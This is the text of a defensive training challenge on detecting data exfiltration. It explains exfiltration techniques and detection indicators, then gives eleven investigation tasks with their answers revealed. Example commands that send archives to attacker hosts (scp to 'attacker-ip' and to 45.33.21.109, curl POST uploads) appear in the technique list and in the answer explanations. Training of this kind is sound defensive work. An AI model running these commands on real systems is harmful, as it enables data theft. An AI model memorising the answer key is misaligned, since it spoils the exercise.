Challenge 05 • Data Exfiltration Detection

Understanding Data Exfiltration

Data exfiltration is the unauthorized transfer of data from a computer system. Attackers typically compress, encrypt, and stage data before transferring it to external servers to avoid detection.

📤 Common Exfiltration Methods

Direct Transfer: SCP, SFTP, FTP, rsync to attacker-controlled servers

Encrypted Channels: HTTPS uploads, SSH tunnels, VPNs

Cloud Storage: Upload to Dropbox, Google Drive, AWS S3

Covert Channels: DNS tunneling, ICMP tunneling, steganography

🎯 Typical Exfiltration Workflow

1. Discovery: Locate valuable data (databases, credentials, PII)

2. Staging: Copy data to temporary location (/tmp, /dev/shm)

3. Compression: tar, gzip, zip to reduce size

4. Encryption (Optional): Encrypt archive to avoid DLP detection

5. Transfer: Send to external server via SCP, curl, nc

6. Cleanup: Delete staging files to hide traces

🔍 Detection Indicators

Command History: tar, gzip, scp, curl to external IPs

Network Traffic: Large outbound transfers, connections to unknown IPs

File System: Large archives in /tmp, recent file modifications

Process Activity: tar/gzip processes, network tools running

Exfiltration Techniques

🚨 SCP/SFTP (This Challenge)

scp file.tar.gz user@attacker-ip:/path
Requires SSH access to external server
Encrypted transfer (hard to inspect)
Leaves bash history traces
Netstat shows ESTABLISHED connections

🌐 HTTP/HTTPS Upload

curl -X POST -F "file=@data.zip" url
wget --post-file=data.tar url
Blends with normal web traffic
Can use legitimate services (pastebin)

🔒 DNS Tunneling

Encode data in DNS queries
Bypasses firewalls (DNS usually allowed)
Slow but covert
Requires custom DNS server

☁️ Cloud Services

rclone copy to cloud storage
AWS CLI s3 upload
Dropbox API uploads
Hard to distinguish from legit usage

Investigation Commands

💡 Defense Tip: Implement DLP solutions, monitor outbound traffic for anomalies, enforce egress filtering, use network segmentation, and maintain command/file integrity monitoring (FIM).

Evidence Review

💻 ~/.bash_history (dbadmin) Click lines to tag as evidence

🌐 netstat -antp (Active Connections)

📄 /var/log/syslog

📌 Evidence Locker

No evidence tagged yet. Click log lines to add them.

Interactive Terminal

Run bash commands to analyze the logs. Available: cat, grep, wc, awk, netstat, find, ls, clear, help

analyst@blueteam:~$ Terminal ready. Type 'help' for available commands.

analyst@blueteam:~$

Investigation Tasks

Tasks Completed: 0 / 11

Task 1 — Exfiltrated Database Name

✓ Correct Answer:

customers

In bash_history: mysqldump -u root -p customers > customers_backup.sql - The "customers" database was dumped to SQL file for exfiltration.

Task 2 — Staging Directory Used

✓ Correct Answer:

/tmp

Commands show: cd /tmp and files created there. /tmp is commonly used for staging because it's world-writable and often not monitored closely.

Task 3 — Archive Filename Created

✓ Correct Answer:

backup.tar.gz

In bash_history: tar -czf backup.tar.gz customers_backup.sql - Created compressed archive named "backup.tar.gz" to reduce transfer size.

Task 4 — Compression Tool Used

✓ Correct Answer:

gzip

The tar command uses -z flag which means gzip compression. The .tar.gz extension confirms this (tar + gzip).

Task 5 — Exfiltration Tool/Protocol Used

✓ Correct Answer:

scp

In bash_history: scp backup.tar.gz exfil@45.33.21.109:/data/ - Used Secure Copy Protocol (SCP) to transfer the archive over SSH.

Task 6 — Attacker's IP Address

✓ Correct Answer:

45.33.21.109

SCP command shows transfer to exfil@45.33.21.109. Netstat also shows ESTABLISHED connection to this IP on port 22 (SSH/SCP).

Task 7 — Destination Port Number

✓ Correct Answer:

Netstat shows connection to 45.33.21.109:22 - Port 22 is standard SSH port used for SCP transfers.

Task 8 — Remote Username on Attacker Server

✓ Correct Answer:

exfil

SCP syntax: scp file user@host:path - The username is "exfil" (exfil@45.33.21.109).

Task 9 — Archive File Size (MB)

✓ Correct Answer:

2300

Syslog shows: File size: 2300MB for backup.tar.gz - This matches the mission brief (2.3 GB transfer detected).

Task 10 — Cleanup Command Used

✓ Correct Answer:

After transfer, bash_history shows: rm -f backup.tar.gz customers_backup.sql - Attacker deleted staging files to hide evidence.

Task 11 — MITRE ATT&CK Technique ID

✓ Correct Answer:

T1048

T1048 = Exfiltration Over Alternative Protocol. Sub-technique T1048.002 specifically covers exfiltration over asymmetric encrypted protocols like SSH/SCP.

XP: 0 / 1100

Attack Analysis & Incident Summary

This section auto-fills once all tasks are completed correctly.

Exfiltration Chain Reconstruction

Complete all tasks to reveal the exfiltration chain.

Incident Summary

Attack type: —
Stolen database: —
Staging location: —
Archive name: —
Compression: —
Transfer method: —
Attacker IP: —
Data volume: — MB
Cleanup action: —
MITRE ATT&CK: —

Recommended Remediation

Immediate: Block 45.33.21.109, revoke database credentials, assess data breach scope, notify stakeholders
Investigation: Check for other compromised accounts, review SSH keys, audit database access logs, timeline reconstruction
Recovery: Rotate all database passwords, review backup integrity, assess regulatory obligations (GDPR, etc.)
Long-term: Implement DLP, egress filtering, database activity monitoring (DAM), network segmentation, MFA for DB access

Why This Attack Succeeded

The data exfiltration succeeded because:
1. Database admin account had unrestricted outbound network access
2. No egress filtering or DLP inspection for SSH/SCP traffic
3. No alerting on large mysqldump operations or file transfers
4. Attacker had compromised credentials with database access
5. Lack of database activity monitoring and anomaly detection

🛡️ Challenge 05 • Data Exfiltration Detection

Mission Brief

Available Artifacts

Learning Objectives

Understanding Data Exfiltration

📤 Common Exfiltration Methods

🎯 Typical Exfiltration Workflow

🔍 Detection Indicators

Exfiltration Techniques

🚨 SCP/SFTP (This Challenge)

🌐 HTTP/HTTPS Upload

🔒 DNS Tunneling

☁️ Cloud Services

Investigation Commands

Evidence Review

Interactive Terminal

Investigation Tasks

Attack Analysis & Incident Summary

Exfiltration Chain Reconstruction

Incident Summary

Recommended Remediation

Why This Attack Succeeded